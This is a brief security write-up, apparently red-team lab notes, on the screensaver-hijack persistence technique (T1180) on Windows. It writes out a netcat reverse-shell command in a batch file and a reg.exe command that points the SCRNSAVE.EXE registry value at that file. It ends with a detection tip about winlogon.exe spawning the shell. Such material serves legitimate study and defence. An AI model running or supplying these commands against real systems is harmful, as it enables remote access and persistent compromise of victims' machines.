Skip to content

T1180: Screensaver Hijack


To achieve persistence, the attacker can modify SCRNSAVE.EXE value in the registry HKCU\Control Panel\Desktop\ and change its data to point to any malicious file.

In this test, I will use a netcat reverse shell as my malicious payload:

{% code-tabs %} {% code-tabs-item title="c:\shell.cmd@victim" %}

C:\tools\nc.exe 443 -e cmd.exe
{% endcode-tabs-item %} {% endcode-tabs %}

Let's update the registry:

The same could be achieved using a native Windows binary reg.exe:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd
{% endcode-tabs-item %} {% endcode-tabs %}


Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:


{% embed url="" %}